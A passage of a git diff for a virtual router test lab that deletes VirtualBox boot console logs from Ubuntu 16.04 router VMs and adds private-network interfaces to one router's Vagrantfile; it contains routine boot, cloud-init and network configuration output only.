Load/Save Random Seed. -[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. -[ OK ] Started Create Static Device Nodes in /dev. - Starting udev Kernel Device Manager... -[ OK ] Reached target Local File Systems (Pre). -[ OK ] Reached target Local File Systems. - Starting Set console font and keymap... - Starting Tell Plymouth To Write Out Runtime Data... - Starting LSB: AppArmor initialization... - Starting Initial cloud-init job (pre-networking)... -[ OK ] Started udev Kernel Device Manager. -[ OK ] Started udev Coldplug all Devices. -[ OK ] Started Tell Plymouth To Write Out Runtime Data. -[ OK ] Started Dispatch Password Requests to Console Directory Watch. -[ OK ] Started Flush Journal to Persistent Storage. -[ OK ] Found device /dev/ttyS0. -[ OK ] Started LSB: AppArmor initialization. -[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. - Starting Load AppArmor profiles managed internally by snapd... - Starting Create Volatile Files and Directories... -[ OK ] Started Load AppArmor profiles managed internally by snapd. -[ OK ] Started Set console font and keymap. -[ OK ] Started Create Volatile Files and Directories. -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). - Starting Update UTMP about System Boot/Shutdown... -[ OK ] Created slice system-getty.slice. -[ OK ] Started Update UTMP about System Boot/Shutdown. -[ 14.303125] cloud-init[493]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:26 +0000. Up 13.29 seconds. -[ OK ] Started Initial cloud-init job (pre-networking). -[ OK ] Reached target Network (Pre). -[ OK ] Started ifup for enp0s10. -[ OK ] Started ifup for enp0s3. -[ OK ] Started ifup for enp0s9. -[ OK ] Started ifup for enp0s8. - Starting Raise network interfaces... -[ OK ] Started Raise network interfaces. -[ OK ] Reached target Network. - Starting Initial cloud-init job (metadata service crawler)... -[ 18.862431] cloud-init[1315]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:30 +0000. Up 17.46 seconds. -[ 18.871088] cloud-init[1315]: ci-info: +++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++ -[ 19.042093] cloud-init[1315]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ -[ 19.069064] cloud-init[1315]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | -[ 19.082229] cloud-init[1315]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ -[ 19.082349] cloud-init[1315]: ci-info: | enp0s10 | True | 192.168.101.2 | 255.255.255.0 | global | 08:00:27:80:81:f6 | -[ 19.082456] cloud-init[1315]: ci-info: | enp0s10 | True | fe80::a00:27ff:fe80:81f6/64 | . | link | 08:00:27:80:81:f6 | -[ 19.082561] cloud-init[1315]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | -[ 19.082676] cloud-init[1315]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | -[ 19.082789] cloud-init[1315]: ci-info: | enp0s8 | True | 192.168.1.254 | 255.255.255.0 | global | 08:00:27:4e:d5:19 | -[ 19.082895] cloud-init[1315]: ci-info: | enp0s8 | True | fe80::a00:27ff:fe4e:d519/64 | . | link | 08:00:27:4e:d5:19 | -[ 19.082998] cloud-init[1315]: ci-info: | enp0s9 | True | 192.168.100.1 | 255.255.255.0 | global | 08:00:27:25:02:6b | -[ 19.083104] cloud-init[1315]: ci-info: | enp0s9 | True | fe80::a00:27ff:fe25:26b/64 | . | link | 08:00:27:25:02:6b | -[ 19.083210] cloud-init[1315]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | -[ 19.083316] cloud-init[1315]: ci-info: | lo | True | ::1/128 | . | host | . | -[ 19.083424] cloud-init[1315]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ -[ 19.083542] cloud-init[1315]: ci-info: ++++++++++++++++++++++++++++Route IPv4 info+++++++++++++++++++++++++++++ -[ 19.083662] cloud-init[1315]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ -[ 19.083783] cloud-init[1315]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | -[ 19.083895] cloud-init[1315]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ -[ 19.084031] cloud-init[1315]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | -[ 19.084146] cloud-init[1315]: ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | -[ 19.084314] cloud-init[1315]: ci-info: | 2 | 192.168.1.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | -[ 19.084433] cloud-init[1315]: ci-info: | 3 | 192.168.100.0 | 0.0.0.0 | 255.255.255.0 | enp0s9 | U | -[ 19.084554] cloud-init[1315]: ci-info: | 4 | 192.168.101.0 | 0.0.0.0 | 255.255.255.0 | enp0s10 | U | -[ 19.084671] cloud-init[1315]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ -[ 19.084791] cloud-init[1315]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ -[ 19.084910] cloud-init[1315]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 19.085026] cloud-init[1315]: ci-info: | Route | Destination | Gateway | Interface | Flags | -[ 19.085133] cloud-init[1315]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 19.085236] cloud-init[1315]: ci-info: | 0 | fe80::/64 | :: | enp0s10 | U | -[ 19.085345] cloud-init[1315]: ci-info: | 1 | fe80::/64 | :: | enp0s9 | U | -[ 19.085459] cloud-init[1315]: ci-info: | 2 | fe80::/64 | :: | enp0s8 | U | -[ 19.085571] cloud-init[1315]: ci-info: | 3 | fe80::/64 | :: | enp0s3 | U | -[ 19.085685] cloud-init[1315]: ci-info: | 10 | ff00::/8 | :: | enp0s10 | U | -[ 19.085807] cloud-init[1315]: ci-info: | 11 | ff00::/8 | :: | enp0s9 | U | -[ 19.085930] cloud-init[1315]: ci-info: | 12 | ff00::/8 | :: | enp0s8 | U | -[ 19.086061] cloud-init[1315]: ci-info: | 13 | ff00::/8 | :: | enp0s3 | U | -[ 19.086188] cloud-init[1315]: ci-info: +-------+-------------+---------+-----------+-------+ -[ OK ] Started Initial cloud-init job (metadata service crawler). -[ OK ] Reached target Network is Online. - Starting iSCSI initiator daemon (iscsid)... -[ OK ] Reached target Cloud-config availability. -[ OK ] Reached target System Initialization. - Starting LXD - unix socket. - Starting Socket activation for snappy daemon. -[ OK ] Started Message of the Day. -[ OK ] Listening on D-Bus System Message Bus Socket. -[ OK ] Listening on UUID daemon activation socket. -[ OK ] Started ACPI Events Check. -[ OK ] Reached target Paths. -[ OK ] Started Daily Cleanup of Temporary Directories. -[ OK ] Listening on ACPID Listen Socket. -[ OK ] Started Daily apt download activities. -[ OK ] Started Daily apt upgrade and clean activities. -[ OK ] Reached target Timers. -[ OK ] Listening on LXD - unix socket. -[ OK ] Listening on Socket activation for snappy daemon. -[ OK ] Started iSCSI initiator daemon (iscsid). - Starting Login to default iSCSI targets... -[ OK ] Reached target Sockets. -[ OK ] Reached target Basic System. -[ OK ] Started FUSE filesystem for LXC. -[ OK ] Started ACPI event daemon. - Starting LSB: Record successful boot for GRUB... - Starting Login Service... - Starting LSB: MD monitoring daemon... -[ OK ] Started Regular background program processing daemon. - Starting Snap Daemon... - Starting System Logging Service... - Starting Virtualbox guest utils... - Starting Accounts Service... - Starting OpenBSD Secure Shell server... -[ OK ] Started Deferred execution scheduler. -[ OK ] Started D-Bus System Message Bus. - Starting /etc/rc.local Compatibility... - Starting LXD - container startup/shutdown... -[ OK ] Started System Logging Service. -[ OK ] Started /etc/rc.local Compatibility. -[ OK ] Started Login Service. -[ OK ] Started OpenBSD Secure Shell server. -[ OK ] Started LSB: Record successful boot for GRUB. -[ OK ] Started LSB: MD monitoring daemon. -[ OK ] Started Virtualbox guest utils. -[ OK ] Started Login to default iSCSI targets. -[ OK ] Reached target Remote File Systems (Pre). -[ OK ] Reached target Remote File Systems. - Starting LSB: daemon to balance interrupts for SMP systems... - Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... - Starting Permit User Sessions... - Starting LSB: start and stop the Quagga routing suite... - Starting LSB: automatic crash report generation... -[ OK ] Started Unattended Upgrades Shutdown. - Starting Authenticate and Authorize Users to Run Privileged Tasks... -[ OK ] Started Snap Daemon. -[ OK ] Started LXD - container startup/shutdown. -[ OK ] Started Permit User Sessions. -[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. -[ OK ] Started Accounts Service. - Starting Hold until boot process finishes up... - Starting Terminate Plymouth Boot Screen... - Starting Wait until snapd is fully seeded... -[ OK ] Started LSB: daemon to balance interrupts for SMP systems. -[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". -[ OK ] Started LSB: start and stop the Quagga routing suite. -[ OK ] Started LSB: automatic crash report generation. -[ OK ] Started Hold until boot process finishes up. -[ OK ] Started Terminate Plymouth Boot Screen. -[ OK ] Started Wait until snapd is fully seeded. - Starting Apply the settings specified in cloud-config... -[ OK ] Started Serial Getty on ttyS0. -[ OK ] Started Getty on tty1. -[ OK ] Reached target Login Prompts. - Starting Set console scheme... -[ OK ] Reached target Multi-User System. -[ OK ] Reached target Graphical Interface. - Starting Update UTMP about System Runlevel Changes... -[ OK ] Started Set console scheme. -[ OK ] Started Update UTMP about System Runlevel Changes. -[ 25.889438] cloud-init[1596]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:38 +0000. Up 25.47 seconds. -[ OK ] Started Apply the settings specified in cloud-config. - Starting Execute cloud user/final scripts... -[ 27.489163] cloud-init[1616]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:40 +0000. Up 27.23 seconds. -[ 27.622203] cloud-init[1616]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:40 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 27.46 seconds -[ OK ] Started Execute cloud user/final scripts. -[ OK ] Reached target Cloud-init target. - -Ubuntu 16.04.7 LTS router11 ttyS0 - -router11 login: \ No newline at end of file diff --git a/virtual-test-environment/routers/router2/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/routers/router2/.vagrant/machines/default/virtualbox/vagrant_cwd deleted file mode 100644 index 9532eaa..0000000 --- a/virtual-test-environment/routers/router2/.vagrant/machines/default/virtualbox/vagrant_cwd +++ /dev/null @@ -1 +0,0 @@ -/home/jive/space/gittin/VeepExploit/virt-lab/routers/router2 \ No newline at end of file diff --git a/virtual-test-environment/routers/router2/Vagrantfile b/virtual-test-environment/routers/router2/Vagrantfile index 745513a..5fc726b 100644 --- a/virtual-test-environment/routers/router2/Vagrantfile +++ b/virtual-test-environment/routers/router2/Vagrantfile @@ -1,5 +1,4 @@ # -*- mode: ruby -*- - # vi: set ft=ruby : Vagrant.configure(2) do |config| @@ -8,8 +7,11 @@ Vagrant.configure(2) do |config| config.vm.network "forwarded_port", guest: 22, host: 22115, id: 'ssh' config.ssh.insert_key = true + config.vm.network "private_network", ip: "192.168.2.254", virtualbox__intnet: "intnet-2" + config.vm.network "private_network", ip: "192.168.100.2", virtualbox__intnet: "intnet-100" + config.vm.network "private_network", ip: "192.168.102.2", virtualbox__intnet: "intnet-102" config.vm.provider "virtualbox" do |vb| diff --git a/virtual-test-environment/routers/router2/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/routers/router2/ubuntu-xenial-16.04-cloudimg-console.log deleted file mode 100644 index 6f23a1f..0000000 --- a/virtual-test-environment/routers/router2/ubuntu-xenial-16.04-cloudimg-console.log +++ /dev/null @@ -1,672 +0,0 @@ -[ 0.000000] Initializing cgroup subsys cpuset -[ 0.000000] Initializing cgroup subsys cpu -[ 0.00000] Initializing cgroup subsys cpuacct -[ 0.000000] Linux version 4.4.0-190-generc (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) -[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=tyS0 -[ 0.000000] KERNEL supported cpus: -[ 0.000000] Intel GeuineIntel -[ 0.000000] AMD AuthenticAMD -[ 0.000000] Centaur CentaurHauls -[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' -[ 0.000000] x86/fpu: Enabled xstate features 0x7, context sze i 832 bytes, using 'standar' fomat. -[ 0.000000] e820: BIOS-provded physcal RAM map: -[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable -[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved -[ 0.00000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved -[ 0.000000] BIOS-e820: [mem 0x000000000010000-0x000000003ffeffff] usable -[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data -[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fee00000x00000000fee00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved -[ 0.000000] NX (Execute Disable) protection: active -[ 0.000000] SMBIOS 2.5 present. -[ 0.000000] Hypervior detected: KVM -[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 -[ 0.000000] MR: Disabled -[ 0.000000] x86/PAT: MRRs disabl, skipping PAT initialization too. -[ 0.000000] CPU MTRRs all blank - virtualized system. -[ 0.000000] x86/PAT: Coonfiuration [0-]: WB T UC- UC WB WT UC- UC -[ 0.000000] found SMP MP-ble at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] -[ 0.000000] Scanning 1 areas for low memory corruption -[ 0.000000] RAMDISK: [mem 0x362e0000-0x37167fff] -[ 0.000000] ACPI: Early table checksum verification disale -[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) -[ .000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 0000001 ASL 00000061) -[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) -[ 0.000000] ACPI: DSDT 0x000000003FF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: CS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) -[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 2080105) -[ .000000] No NUMA configuration found -[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] -[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] -[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 -[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, rimary cpu clock -[ 0.00000] kv-clok: using sche offs of 3639878016 cycles -[ 0.000000] clocksource: kvm-cloc mask: 0xfffffffffffffff max_cycles: 0x1d42e4dfb, max_idle_ns: 88590591483 ns -[ 0.000000 Zone ranes -[ 0.00000] DMA [mem 0x00000000001000-0x0000000000ffffff] -[ 0.000000] DMA32 [mem 0x000000000100000-0x00000000ffeffff] -[ 0.000000] Normal empt -[ 0.00000] Device empty -[ 0000000] Movable zone start for eac node -[ 0.000000] Early mmory node ranges -[ 0.000000] node 0: [mem 00000000000001000-0x000000000009efff] -[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] -[ 0.000000] Initmem setup node 0 [mem 0x000000000000100-0x000000003ffeffff] -[ 0.000000] ACPI: PM-Tier IO Port: 0x4008 -[ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) -[ 0.000000] ACPI: NT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) -[ 0.000000] Using ACPI (MADT) for SMP configuration information -[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs -[ 0.000000] PM: Registered nosave memory: [mem 0x00000000-0x00000fff] -[ 0.000000] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000a0000-0x000effff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] -[ 0.000000] e820:: [m 0x40000000-0xfebfffff] available for PCI devices -[ 0.000000] Booting paravirtualized kernel on KVM -[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns -[ 0.000000] setup_percpu: NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 -[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 -[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 257912 -[ 0.000000] Policy zone: DMA32 -[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes) -[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) -[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 -[ 0.000000] Kernel/User page tables isolation: enabled -[ 0.000000] Hierarchical RCU implementation. -[ 0.000000] Build-time adjustment of leaf fanout to 64. -[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. -[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 -[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 -[ 0.000000] Console: colour VGA+ 80x25 -[ 0.000000] console [tty1] enabled -[ 0.000000] console [ttyS0] enabled -[ 0.000000] tsc: Detected 2207.998 MHz processor -[ 2.548984] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) -[ 2.552312] pid_max: default: 32768 minimum: 301 -[ 2.556585] ACPI: Core revision 20150930 -[ 2.559376] ACPI: 2 ACPI AML tables successfully acquired and loaded -[ 2.568111] Security Framework initialized -[ 2.570828] Yama: becoming mindful. -[ 2.576301] AppArmor: AppArmor initialized -[ 2.578169] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) -[ 2.585174] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) -[ 2.587998] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 2.590791] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 2.593974] Initializing cgroup subsys io -[ 2.595772] Initializing cgroup subsys memory -[ 2.597570] Initializing cgroup subsys devices -[ 2.599448] Initializing cgroup subsys freezer -[ 2.602117] Initializing cgroup subsys net_cls -[ 2.604868] Initializing cgroup subsys perf_event -[ 2.606725] Initializing cgroup subsys net_prio -[ 2.608773] Initializing cgroup subsys hugetlb -[ 2.610526] Initializing cgroup subsys pids -[ 2.625138] mce: CPU supports 0 MCE banks -[ 2.627220] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 -[ 2.629792] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 -[ 2.632218] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization -[ 2.637410] Spectre V2 : Mitigation: Full generic retpoline -[ 2.641863] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch -[ 2.647748] Speculative Store Bypass: Vulnerable -[ 2.649859] SRBDS: Unknown: Dependent on hypervisor status -[ 2.652113] MDS: Mitigation: Clear CPU buffers -[ 2.656626] Freeing SMP alternatives memory: 36K -[ 2.670551] ftrace: allocating 32339 entries in 127 pages -[ 2.782531] smpboot: APIC(0) Converting physical 0 to logical package 0 -[ 2.783988] smpboot: Max logical packages: 1 -[ 2.785375] x2apic enabled -[ 2.787490] Switched APIC routing to physical x2apic. -[ 2.791797] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 -[ 2.902569] APIC calibration not consistent with PM-Timer: 98ms instead of 100ms -[ 2.907442] APIC delta adjusted to PM-Timer: 6250268 (6138640) -[ 2.910804] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) -[ 2.916096] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. -[ 2.948653] KVM setup paravirtual spinlock -[ 2.958280] x86: Booting SMP configuration: -[ 2.968692] .... node #0, CPUs: #1 -[ 2.988639] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock -[ 3.038007] mce: CPU supports 0 MCE banks -[ 3.051680] x86: Booted up 1 node, 2 CPUs -[ 3.052944] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) -[ 3.062040] devtmpfs: initialized -[ 3.071009] evm: security.selinux -[ 3.073821] evm: security.SMACK64 -[ 3.086917] evm: security.SMACK64EXEC -[ 3.094604] evm: security.SMACK64TRANSMUTE -[ 3.100914] evm: security.SMACK64MMAP -[ 3.107131] evm: security.ima -[ 3.119266] evm: security.capability -[ 3.120417] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns -[ 3.122572] futex hash table entries: 512 (order: 3, 32768 bytes) -[ 3.124141] pinctrl core: initialized pinctrl subsystem -[ 3.133057] RTC time: 22:38:13, date: 01/25/21 -[ 3.134657] NET: Registered protocol family 16 -[ 3.148766] cpuidle: using governor ladder -[ 3.159559] cpuidle: using governor menu -[ 3.160546] PCCT header not found. -[ 3.161551] ACPI: bus type PCI registered -[ 3.162580] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 -[ 3.164212] PCI: Using configuration type 1 for base access -[ 3.187926] ACPI: Added _OSI(Module Device) -[ 3.199874] ACPI: Added _OSI(Processor Device) -[ 3.202178] ACPI: Added _OSI(3.0 _SCP Extensions) -[ 3.211889] ACPI: Added _OSI(Processor Aggregator Device) -[ 3.216894] ACPI: Executed 1 blocks of module-level executable AML code -[ 3.224295] ACPI: Interpreter enabled -[ 3.229163] ACPI: (supports S0 S5) -[ 3.248492] ACPI: Using IOAPIC for interrupt routing -[ 3.251792] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug -[ 3.278616] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) -[ 3.290426] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] -[ 3.291853] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] -[ 3.299935] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. -[ 3.308275] PCI host bridge to bus 0000:00 -[ 3.317033] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] -[ 3.323789] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] -[ 3.336766] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] -[ 3.346474] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] -[ 3.348226] pci_bus 0000:00: root bus resource [bus 00-ff] -[ 3.363411] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] -[ 3.372521] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] -[ 3.385247] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] -[ 3.387555] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] -[ 3.423139] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI -[ 3.434121] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB -[ 3.477489] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) -[ 3.479892] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) -[ 3.483040] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) -[ 3.495152] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) -[ 3.508169] ACPI: Enabled 2 GPEs in block 00 to 07 -[ 3.512296] vgaarb: setting as boot device: PCI:0000:00:02.0 -[ 3.513571] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none -[ 3.521248] vgaarb: loaded -[ 3.523468] vgaarb: bridge control possible 0000:00:02.0 -[ 3.532718] SCSI subsystem initialized -[ 3.535460] ACPI: bus type USB registered -[ 3.543046] usbcore: registered new interface driver usbfs -[ 3.546496] usbcore: registered new interface driver hub -[ 3.547841] usbcore: registered new device driver usb -[ 3.569351] PCI: Using ACPI for IRQ routing -[ 3.570520] NetLabel: Initializing -[ 3.573419] NetLabel: domain hash size = 128 -[ 3.576596] NetLabel: protocols = UNLABELED CIPSOv4 -[ 3.579115] NetLabel: unlabeled traffic allowed by default -[ 3.585597] amd_nb: Cannot enumerate AMD northbridges -[ 3.587158] clocksource: Switched to clocksource kvm-clock -[ 3.609154] AppArmor: AppArmor Filesystem Enabled -[ 3.610274] pnp: PnP ACPI init -[ 3.612066] pnp: PnP ACPI: found 3 devices -[ 3.1835] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns -[ 3.705662] NET: Registered protocol family 2 - -[ 3.706980] TCP established hash table entries: 8192 (order: 4, 65536 bytes) -[ 3.737219] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) -[ 3.738648] TCP: Hash tables configured (established 8192 bind 8192) -[ 3.755003] UDP hash table entries: 512 (order: 2, 16384 bytes) -[ .762886] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) -[ 3.87069] NET: Registered protocol family 1 -[ 3.914774] pci 0000:00:00.0: Limiting direct PCI/PCI transfers -[ 3.921811] pci 0000:00:0.0: Activating ISA DMA hang workarounds -[ 3.971080] Unpacking initramfs... - -[ 4.648526] Freeing initrd memory: 14880K -[ 4.652483] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns -[ 4.667839] platform rtc_cmos: registered platform RTC device (no PNP device found) -[ 4.671408] Scanning for low memory corruption every 60 seconds -[ 4.683220] audit: initializing netlink subsys (disabled) -[ 4.685539] audit: type=2000 audit(1611614297.807:1): initialized -[ 4.688483] Initialise system trusted keyring -[ 4.692508] HugeTLB registered 2 MB page size, pre-allocated 0 pages -[ 4.696642] zbud: loaded -[ 4.699806] VFS: Disk quotas dquot_6.6.0 -[ 4.701484] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) -[ 4.704888] squashfs: version 4.0 (2009/01/31) Phillip Lougher -[ 4.709143] fuse init (API version 7.23) -[ 4.716792] Key type big_key registered -[ 4.718704] Allocating IMA MOK and blacklist keyrings. -[ 4.722690] Key type asymmetric registered -[ 4.724451] Asymmetric key parser 'x509' registered -[ 4.728098] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) -[ 4.737750] io scheduler noop registered -[ 4.739774] io scheduler deadline registered (default) -[ 4.741687] io scheduler cfq registered -[ 4.746021] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 -[ 4.750754] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 -[ 4.755449] ACPI: AC Adapter [AC] (on-line) -[ 4.758334] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 -[ 4.763953] ACPI: Power Button [PWRF] -[ 4.769120] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 -[ 4.774267] ACPI: Sleep Button [SLPF] -[ 4.788163] ACPI: Battery Slot [BAT0] (battery present) -[ 4.792629] GHES: HEST is not enabled! -[ 4.799136] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled -[ 4.829188] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A -[ .838830] Linux agpgart interface v0.103 - -[ 4.997005] loop: module loaded -[ 5.002438] scsi host0: ata_piix -[ 5.009428] scsi host1: ata_piix -[ 5.010418] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 -[ 5.015681] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 -[ 5.025124] libphy: Fixed MDIO Bus: probed -[ 5.037041] tun: Universal TUN/TAP device driver, 1.6 -[ 5.042524] tun: (C) 1999-2004 Max Krasnyansky -[ 5.047130] PPP generic driver version 2.4.2 -[ 5.055148] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver -[ 5.057113] ehci-pci: 